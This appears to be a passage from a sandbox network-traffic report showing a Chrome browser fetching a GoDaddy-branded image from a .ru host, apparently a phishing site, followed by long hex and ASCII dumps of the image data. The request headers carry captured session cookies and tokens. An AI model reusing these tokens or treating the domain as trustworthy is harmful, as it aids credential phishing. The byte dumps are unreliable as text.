                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1638INData Raw: 95 06 eb 8f f0 0e 40 77 0e 63 ea fa a0 6a 0e d5 33 f0 ff a9 9f 77 2c 2f d0 9d 33 dc 29 0d 8b 0c ca 89 b5 75 02 c3 bb 81 e6 8d 9e 83 f5 17 62 a4 7d ac 9f 52 e6 c2 01 83 c0 ab 1a f2 20 60 cd 2a de 84 8a 84 8a 13 60 6d 48 24 98 55 eb 9d 12 42 e9 95 ae 48 31 0f 15 b5 6a 78 0e c0 33 11 9e 24 6b 20 1c f5 00 a0 0b b3 19 1e d7 87 ac 1b 5a 1c 81 cf 9e 14 09 96 34 f5 90 bf c8 41 fa 3e ce aa d1 58 f0 9d 61 2f f4 19 10 30 4e 2e 26 3f 71 f4 eb ee c9 c5 fd bd b3 e8 0b 46 23 77 26 6f 88 22 4c 3a 96 b2 e8 6c 0e 63 cc 86 e0 ac 8e 9a 78 bb 50 ea 86 ee d1 90 40 65 d2 0b 26 01 26 7c 59 a0 10 ac 21 e8 8f 69 d1 f4 00 ee 67 61 63 00 e3 31 43 e6 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0
                                                                                                                                                                                                                                                                                                              Data Ascii: @wcj3w,/3)ub}R `*`mH$UBH1jx3$k Z4A>Xa/0N.&?qF#w&o"L:lcxP@e&&|Y!igac1CIte~q&62B}*VpB"'Ms


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              143192.168.2.1649855104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1639OUTGET /web5/assets/godaddy-left.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              144104.21.0.95443192.168.2.1649853C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1640INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Content-Length: 49602
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 24 Aug 2023 13:40:53 GMT
                                                                                                                                                                                                                                                                                                              ETag: "c1c2-603ab607e0f57"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kdmUZnwyAo7EeBL%2FzAEghkEI87QJ0ZvCCIlxKsKHPIy2TygbiNnR3g6KfGNsomm3GK9XlS5FVG%2BmOecxPi29ZeSZed7igra3E3j9QRwZumxW95IL3YvYik4voUxS%2BUdJHDI4Wo6oqimB0qI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                              Age: 9551
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd66a4f8a0851-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1641INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1642INData Raw: 0f b0 2e b0 25 b0 45 9f b7 9b 01 43 e2 62 65 33 0b 18 4b ba a6 ee e9 53 13 22 43 49 92 24 49 92 24 49 92 24 49 b2 81 a3 6a 56 02 76 06 76 01 76 24 35 6c 0c 0f 4d d4 79 73 49 ab 08 dc 05 dc dd 78 7b 2f 69 db 16 a9 59 eb 92 9a 9f b6 6f d4 b6 a4 6d 84 ba cd 13 a4 eb e9 76 e0 36 e0 3e 52 b3 87 24 49 92 24 49 92 24 49 92 a4 0e b1 81 a3 dc 46 02 7b 92 1a 36 76 21 ad 04 e0 31 7b ad 59 a4 95 39 6e 67 fe 04 f4 53 a1 89 54 46 83 49 cd 1a 3b 03 6f 26 35 41 ad 1c 9a a8 bc 26 01 77 02 b7 02 7f 24 35 4a cd 0e 4d 24 49 92 24 49 92 24 49 92 24 d5 9c cd 00 e5 d2 03 bc 01 d8 b7 51 3b 92 b6 49 51 f3 c6 91 1a 39 6e 05 6e 6c fc 5a dd 65 08 b0 13 b0 1b a9 01 6a 07 60 68 64 a0 0a 7b 01 f8 3d 70 2d 70 3d 6e b9 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0
                                                                                                                                                                                                                                                                                                              Data Ascii: .%ECbe3KS"CI$I$I$IjVvvv$5lMysIx{/iYomv6>R$I$I$IF{6v!1{Y9ngSTFI;o&5A&w$5JM$I$I$I$Q;IQ9nnlZej`hd{=p-p=n"I$I$I$egG
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1643INData Raw: 88 15 81 eb 89 9f 38 b4 ac 4e d5 f3 c0 e1 40 2f 4b b6 25 70 4b 09 32 5b 56 a7 6a 3a f0 71 24 49 92 24 49 92 24 49 92 24 75 d4 7a c0 3f 88 9f 30 b4 ac 88 ba 07 d8 9e fe 0d 03 4e 21 4d 66 47 e7 b4 ac 88 3a 97 a5 6b 72 92 24 49 92 24 49 92 24 49 92 d4 a6 1d 81 67 89 9f 24 b4 ac c8 9a 4d da 56 65 79 e6 db 0f 18 57 82 6c 96 15 5d bf 22 35 33 49 92 24 49 92 24 49 92 24 49 a5 d2 13 1d 20 a3 77 03 3f 06 86 46 07 91 4a e2 19 e0 cb c0 3b 81 b7 07 67 91 ca e4 7f 81 77 00 13 a2 83 48 92 24 49 92 24 49 92 24 49 f3 d4 a5 81 e3 30 e0 62 60 60 74 10 49 52 25 3c 0e ec d9 78 2b 49 92 24 49 92 24 49 92 24 85 eb 8d 0e 90 c1 d1 c0 25 d8 bc 21 49 5a 7a eb 03 b7 03 5b 45 07 91 24 49 92 24 49 92 24 49 92 a0 fa 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49
                                                                                                                                                                                                                                                                                                              Data Ascii: 8N@/K%pK2[Vj:q$I$I$I$uz?0N!MfG:kr$I$I$Ig$MVeyWl]"53I$I$I$I w?FJ;gwH$I$I$I0b``tIR%<x+I$I$I$%!IZz[E$I$I$IgPD$IG` $I
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1644INData Raw: 17 91 f5 ed b6 47 51 92 24 49 92 24 49 92 24 49 0a d2 0b 5c 4f fc a4 5b 54 3d 00 ec d9 f6 28 2a b7 1e d2 aa 02 bf 05 66 13 7f 9e 58 0b d6 d3 c0 09 c0 ca 8b 3a 80 0a 33 14 38 19 98 42 fc 79 12 55 ef 69 7b 14 25 49 92 24 49 92 24 49 92 a4 00 47 10 3f d9 16 51 13 81 a3 80 81 ed 0f a1 0a b6 11 70 2e 6e af 52 86 fa 33 f0 7e 60 d0 62 8f 98 ca 60 2d e0 a7 c4 9f 33 11 35 81 b4 b2 94 24 49 92 24 49 92 24 49 92 54 19 eb 00 93 88 9f 6c eb 74 5d 0b ac 91 61 fc d4 59 cb 93 9a 6e ba 7d 8b 88 4e d7 6c e0 4a dc 26 a5 aa f6 07 c6 13 7f 1e 75 ba 7e 96 63 f0 24 49 92 24 49 92 24 49 92 a4 4e e8 01 ae 23 7e 92 ad 93 f5 32 70 78 e3 73 57 75 f5 02 07 01 0f 11 7f 4e d5 b9 66 03 57 03 af 5f ba c3 a2 12 1b 01 5c 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2
                                                                                                                                                                                                                                                                                                              Data Ascii: GQ$I$I$I\O[T=(*fX:38ByUi{%I$I$IG?Qp.nR3~`b`-35$I$I$ITlt]aYn}NlJ&u~c$I$I$IN#~2pxsWuNfW_\@9zw$I$I$IQ
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1646INData Raw: ba d5 40 e0 49 e2 27 c1 72 d4 fd c0 b0 bc c3 a3 92 db 9a 7a ad 1e d3 ea 04 f2 d1 ed 0e a4 d4 61 6f a3 3e 5b 1e 9d 94 79 6c 24 49 92 24 49 92 24 49 92 d4 a5 de 47 fc e4 57 8e 9a 02 6c 91 79 6c 54 6e 9b 00 cf 11 7f ee 45 d6 e3 c0 1b da 1d 48 29 c8 39 c4 5f 43 39 ea 69 60 50 e6 b1 91 24 49 92 24 49 92 24 49 52 17 ba 83 f8 c9 af 1c f5 99 dc 03 a3 52 5b 03 18 4b fc 79 17 59 d7 00 23 db 1d 48 29 d0 10 e0 1f c4 5f 4b 39 ea e0 cc 63 23 49 92 24 49 92 24 49 92 a4 2e f3 7a e2 27 bd 72 d4 5f 80 01 99 c7 46 e5 b5 12 f0 00 f1 e7 5d 54 cd 01 ce 00 7a db 1d 48 a9 04 de 08 cc 26 fe ba 6a b7 ee c8 3d 30 92 24 49 92 24 49 92 24 49 ea 2e 3f 20 7e d2 ab dd 9a 01 6c 95 7b 60 54 5a cb 92 1a 76 a2 cf bb a8 9a 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24
                                                                                                                                                                                                                                                                                                              Data Ascii: @I'rzao>[yl$I$I$IGWlylTnEH)9_C9i`P$I$I$IRR[KyY#H)_K9c#I$I$I.z'r_F]TzH&j=0$I$I$I.? ~l{`TZv(Jr>V6H$I$
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1647INData Raw: 24 2d 68 6d d2 ea 56 d1 f7 ee 56 6b 16 f0 f6 ec a3 22 2d de 0f 88 3f f7 db a9 1f e4 1f 12 49 65 70 27 f1 5f 60 5a ad 53 f2 0f 87 4a e4 42 e2 cf b1 4e d5 74 e0 5d 79 86 4d ea 0a 43 49 4b 2f 47 5f bb ad d6 c1 f9 87 44 aa 84 1e 60 27 d2 d2 a8 63 89 bf 16 bb b1 fe 46 7a b2 79 e3 25 1c 2b 49 8a d6 4d 3f 0f 5a cd d7 24 e0 36 d2 f7 14 1f 00 d6 44 92 a4 ee d6 03 fc 99 f8 7b 74 bb f5 12 b0 72 e6 b1 91 16 e5 63 c4 9f f3 39 ea 90 dc 03 23 29 d6 68 aa b7 2c d0 bc 9a de c8 af 7a fa 04 f1 e7 58 a7 6a 1a 69 89 73 49 cd f9 1a f1 d7 6f ab 75 79 01 e3 21 95 d9 86 a4 c6 db 47 89 bf fe ac f9 75 1f 70 3c e9 29 2d 49 2a 93 cd 48 4f 60 46 7f 9d b4 aa 55 8f 01 97 00 ff 45 fa de 43 92 a4 6e 72 10 f1 f7 e2 5c 75 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85
                                                                                                                                                                                                                                                                                                              Data Ascii: $-hmVVk"-?Iep'_`ZSJBNt]yMCIK/G_D`'cFzy%+IM?Z$6D{trc9#)h,zXjisIouy!Gup<)-I*HO`FUECnr\uF3j? !5qI
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1648INData Raw: 38 76 eb 64 88 8c 7e 1b 1d 40 59 6c 4a fd 1b 1b 2e 01 4e 8c 0e 21 75 a1 59 c0 75 d1 21 5a 30 02 d8 3a 3a 84 ba d6 3b 81 87 80 63 81 41 c1 59 54 4f ab 03 57 92 b6 ce 1b 15 9c 45 92 a4 22 8d 26 ad 3e 75 3f b0 7f 70 16 49 92 24 49 52 09 d5 a9 81 e3 19 e0 af d1 21 d4 b6 41 c0 8f 80 61 d1 41 0a f4 7b e0 70 60 6e 74 10 a9 4b 5d 13 1d a0 45 55 5d 1d 4b d5 35 12 f8 31 f0 2b 60 8d e0 2c ea 0e 07 93 26 b4 5c 8d 43 92 54 77 1b 02 57 91 9a cb 37 0d ce 22 49 92 24 49 2a 91 fe 1a 38 d6 01 d6 ee 74 90 0c ae c5 09 f1 3a 38 09 d8 2e 3a 44 81 ee 03 0e 04 66 46 07 91 ba d8 ef 80 d9 d1 21 5a b0 4b 74 00 75 95 fd 49 13 e9 1f 88 0e a2 ae 33 9a b4 1a c7 c5 c0 f0 e0 2c 92 24 15 6d 6f e0 ef c0 59 c0 0a c1 59 24 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43
                                                                                                                                                                                                                                                                                                              Data Ascii: 8vd~@YlJ.N!uYu!Z0::;cAYTOWE"&>u?pI$IR!AaA{p`ntK]EU]K51+`,&\CTwW7"I$I*8t:8.:DfF!ZKtuI3,$moYY$I$I%_OTvC
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1650INData Raw: ab e2 76 5c 55 bb 67 ab 33 3e 07 9c 11 1d 42 2a 91 f7 03 df 89 0e 21 49 52 87 0d 06 7e 0c 1c 1a 1d 44 92 24 49 92 d4 bc 79 0d 1c ab 00 23 22 83 b4 e0 6f d1 01 b4 d4 be 0e ac 16 1d 22 b3 47 80 8f 46 87 90 94 45 15 1b 38 36 8e 0e a0 d2 39 06 38 33 3a 84 54 42 47 90 56 a6 91 24 a9 9b 0c 00 7e 08 7c 20 3a 88 24 49 92 24 a9 39 f3 1a 38 aa f8 24 ef 3f a2 03 68 a9 6c 07 7c 3c 3a 44 66 53 81 83 80 57 a2 83 48 ca e2 29 60 52 74 88 26 55 f1 be ad e2 1c 0d 7c 2b 3a 84 54 62 a7 03 ef 8a 0e 21 49 52 87 0d 00 2e 05 0e 89 0e 22 49 92 24 49 25 f1 1b 60 6e 1b 75 63 3f ff e6 53 fd fc bd c9 c0 06 4b c8 f2 5e 60 7a 3f 1f 3b be ca 0d 1c 8f 46 07 d0 12 0d 00 ce 6f bc ad 93 a3 70 05 18 a9 6e aa 76 4f d9 30 3a 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00
                                                                                                                                                                                                                                                                                                              Data Ascii: v\Ug3>B*!IR~D$Iy#"o"GFE86983:TBGV$~| :$I$98$?hl|<:DfSWH)`Rt&U|+:Tb!IR."I$I%`nuc?SK^`z?;FopnvO0:JR?"IR
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1651INData Raw: 24 ab af 2f 00 57 90 56 5e 91 a4 48 53 49 cb a8 d6 d5 10 16 7c d1 4a e5 b0 25 f0 4d ea f5 da 8e 24 49 92 24 45 7a 14 f8 0d f0 ae 7e fe ec 1a d2 c3 84 fd 1a 08 2c 57 50 a8 a2 bc 00 cc 88 0e a1 05 9c 4a 7d 26 11 9e 03 3e 13 1d 42 b5 30 1a 38 1c d8 13 58 9f 74 8d 8c 23 3d e1 7d 09 70 4f 54 30 2d 52 d5 1a 38 06 92 5e fc 7e 35 3a 88 0a b1 11 70 5e 74 88 9a 98 02 5c 0d fc 8c d4 b4 51 c5 49 b1 b9 c0 83 8d 3a 9f b4 e4 de de c0 3b 1a b5 72 5c b4 da 18 0c 5c 44 5a f5 64 76 70 16 49 dd ed 24 e0 cc e8 10 1d b0 2c 69 75 a9 91 c0 28 60 0d d2 c3 21 6b 93 b6 12 db 02 57 9c eb b4 23 80 eb 49 df 37 49 92 24 49 92 da 77 26 fd 37 70 2c f1 e7 fe d3 49 2f 0a 57 a5 7c 2a ae 5c b6 25 bd c8 1d 7d 5e e4 aa f7 e5 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a
                                                                                                                                                                                                                                                                                                              Data Ascii: $/WV^HSI|J%M$I$Ez~,WPJ}&>B08Xt#=}pOT0-R8^~5:p^t\QI:;r\\DZdvpI$,iu(`!kW#I7I$Iw&7p,I/W|*\%}^ue&w/
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1652INData Raw: cc 92 a4 7a 18 4b da be 72 47 e0 ce d8 28 95 f1 21 e0 0d d1 21 24 49 92 24 a9 5b f4 36 aa 4a aa 36 b9 56 27 bd a4 17 f8 eb e0 2a e0 da e8 10 2a b5 2d 80 5b 81 0b 81 15 3b f4 7f ae 07 1c da a1 ff 4b fd ab da 3d a6 6a f7 70 bd d6 c9 a4 55 7e b4 a0 59 c0 f1 c0 5b 81 c7 83 b3 d4 dd 2c e0 34 d2 6a 1c 0f 05 67 29 a3 8d 81 f7 46 87 90 24 65 77 37 b0 33 e9 e7 af 09 c1 59 ca ae 17 38 3b 3a 84 24 49 92 24 75 8b 5e aa f7 44 d9 ac e8 00 5d ec 3d a4 49 ed aa 9b 0a 7c 36 3a 84 4a 6b 28 69 59 f9 7b 48 2f e8 75 da 09 b8 aa 42 a4 aa 2d a5 6c 03 47 b5 6d 0a 7c 3a 3a 44 09 3d 09 ec 0e 7c 9d ea 5d 93 55 36 06 d8 1e f8 59 74 90 12 3a 11 bf de 4a 52 1d cd 25 6d 95 b9 09 a9 71 5f 8b b6 0b 70 60 74 08 49 92 24 49 ea 06 bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48
                                                                                                                                                                                                                                                                                                              Data Ascii: zKrG(!!$I$[6J6V'**-[;K=jpU~Y[,4jg)F$ew73Y8;:$I$u^D]=I|6:Jk(iY{H/uB-lGm|::D=|]U6Yt:JR%mq_p`tI$I-%>o|lH
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1654INData Raw: 7d 6a 4a b1 9f 86 d4 11 83 99 7f 9d cc bb 66 d6 60 c1 6b 65 24 f3 7f be 59 81 74 dd cc 26 5d 27 90 ae 9b 49 a4 d7 e8 e6 d5 33 c0 58 e0 f1 46 3d 8d df 23 aa 3e 56 25 dd 67 d6 25 5d 37 6b 32 ff 3e 33 af 86 37 fe ee 50 e6 cf 29 4d 02 66 31 ff fa 79 81 05 af 9b 71 a4 fb cb e3 a4 eb 67 5a d1 9f 88 24 55 89 0d 1c ea cf 10 e0 13 d1 21 32 38 8e f4 4d 82 ea 6f 55 e0 2c e0 fd d1 41 0a 32 8c 74 4d 9e 1a 1d a4 0b b8 02 87 8a b0 31 69 b5 82 6e 75 09 70 76 74 08 15 e2 46 d2 f2 e9 ff 13 1d a4 c3 ee 8f 0e 20 56 22 4d 9a 6e d9 a8 ad 80 cd 59 b0 21 a3 59 cb 30 ff c5 c6 a5 dd 7e 6f 3a f0 4f e0 01 60 4c 9f b7 8f b7 91 43 52 35 bc 02 bc 0d b8 93 34 a1 d1 ad 76 06 b6 03 ee 8e 0e d2 25 36 06 76 20 dd f7 b6 02 b6 20 35 2b b6 62 48 a3 60 e9 ee 7b e3 80 7b 49 ab 9d fe 15 f8 0b 69
                                                                                                                                                                                                                                                                                                              Data Ascii: }jJf`ke$Yt&]'I3XF=#>V%g%]7k2>37P)Mf1yqgZ$U!28MoU,A2tM1inupvtF V"MnY!Y0~o:O`LCR54v%6v 5+bH`{{Ii
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1655INData Raw: 91 1a 19 5e 22 fe 78 75 ba 26 03 df 01 d6 6d 77 10 17 a1 07 f8 3c d5 da be 72 3a a9 f9 cb 55 4a fa b7 0c a9 69 e3 cf c4 1f ab 88 7a 11 f8 6f f2 ae 02 e8 0a 1c f5 b7 03 69 c5 88 57 89 3f 36 9d ae 39 c0 ef 49 0f 80 e6 e4 0a 1c 49 0f 70 24 69 35 c9 e8 cf a1 dd fa 39 e9 fb 76 35 ef 23 a4 07 9c a2 8f 61 b3 35 0b 38 9d 0a be 5e 7d 01 f1 83 d7 4c dd 5d cc 30 88 f4 43 43 f4 f1 6d b7 dc 97 bc 5e 7a 49 4b b1 4e 24 fe dc 2a 4b cd c4 25 dc 8b b2 33 f1 c7 b7 d9 da b4 90 91 50 2e e7 11 7f 8e 74 ba 66 00 5b e7 18 3c 55 d6 ea 54 73 52 e2 21 e0 38 d2 53 9b 2a c6 26 c0 f7 48 2b 4e 44 1f ef 2a d4 9d c0 21 d8 48 b4 38 63 89 3f 4e 45 94 0d 1c d5 b6 2f dd db 9c f6 df 19 c6 af 8e 7a 49 4f 29 fe 81 f8 63 54 86 9a 4e 6a e4 c8 39 71 d2 4b 5a ad 20 fa 73 6b b5 7e 41 39 9f 5c 8d 32
                                                                                                                                                                                                                                                                                                              Data Ascii: ^"xu&mw<r:UJizoiW?69IIp$i59v5#a58^}L]0CCm^zIKN$*K%3P.tf[<UTsR!8S*&H+ND*!H8c?NE/zIO)cTNj9qKZ sk~A9\2
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1656INData Raw: 75 1b e3 9d da 9a 18 67 03 c3 5b 98 7f 2f e0 48 cf 28 e0 d7 f8 e7 4c dd e3 45 60 8b 16 ff 06 a5 17 70 dc 15 41 e6 a6 c7 33 b4 f6 bd a3 44 7f 41 ff f7 69 62 7c b8 ce 49 6a 4a 37 69 b6 60 af 7a 5e 95 fb a0 fe c0 7e ea 10 1d 9a d1 2e d1 a5 65 75 ac 72 f8 67 58 db 44 d7 9e be c0 41 ea 10 99 59 40 1d a0 4d af a9 03 b8 79 da 53 1d 20 b0 1f 62 bb e5 9c 9b d3 eb c0 ff 05 ba af 77 80 df 03 9b 61 dd e5 be 0b 3c 1f e8 be 4b 35 0a 3b 4b f8 2e bc 1b 9e d2 7c c0 89 c0 c3 58 b7 19 e7 5c 3c 1e c5 3a e5 94 e6 e3 ea 00 01 74 61 bb de 1f 02 f6 c5 37 15 d5 a9 1b 38 0e eb 3a da db 82 f4 50 ec ba 66 2e 72 3e 32 7c 3e e0 e7 c0 0d c0 aa e2 2c 39 da 1d b8 1d 9f db dc ec 83 75 19 3a 08 ff 9c a9 db c2 c0 55 58 21 bc cf 6d cf fa aa 03 04 b0 18 76 2d c9 cd ae 2f d6 69 35 47 2f a8 03
                                                                                                                                                                                                                                                                                                              Data Ascii: ug[/H(LE`pA3DAib|IjJ7i`z^~.eurgXDAY@MyS bwa<K5;K.|X\<:ta78:Pf.r>2|>,9u:UX!mv-/i5G/
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1658INData Raw: 6c 89 6f 58 9a d3 05 ea 00 81 8c c1 8b 77 66 d8 46 1d a0 21 97 91 d0 75 c6 54 0b 38 86 e2 67 81 75 2a f5 ea 5b ef be 11 a7 1d b1 f3 e8 8f c5 2f 72 84 b4 0e b6 43 d9 55 97 5a 61 e0 34 d2 fb ec 2e 41 29 05 1c 53 b1 9d 3c ce 55 f1 36 f0 45 60 31 e0 43 c0 1a 58 7b e5 e1 d8 0f c4 5f 02 6f ca d2 39 b0 02 9a bf 63 df e7 fc d8 8d bc 2c 06 5c 0b 7c 09 ff db 3a a7 f0 23 60 8a 3a 44 40 a9 1e a3 b2 18 70 03 b0 ab 3a 88 9b ab 8d 81 53 d4 21 dc 6c d6 05 6e 25 ed a2 ad 9c 0d c0 0a d2 52 dc b8 94 ab c1 c0 d9 c0 31 ea 20 6e 9e 0e 06 8e 54 87 88 c8 f9 ea 00 81 0c 05 36 55 87 88 44 aa df e3 7b 73 a9 3a 40 3b 52 2d e0 80 f4 16 db 62 d2 1f d8 53 1d a2 03 37 60 ad 9b 5c 3c 46 03 7f 05 2e 01 96 d2 46 29 96 77 e1 e8 4c 6a 9f 29 af 62 47 0c b8 78 0c c1 ba 5b 95 e0 6a e0 71 75 08
                                                                                                                                                                                                                                                                                                              Data Ascii: loXwfF!uT8gu*[/rCUZa4.A)S<U6E`1CX{_o9c,\|:#`:D@p:S!ln%R1 nT6UD{s:@;R-bS7`\<F.F)wLj)bGx[jqu
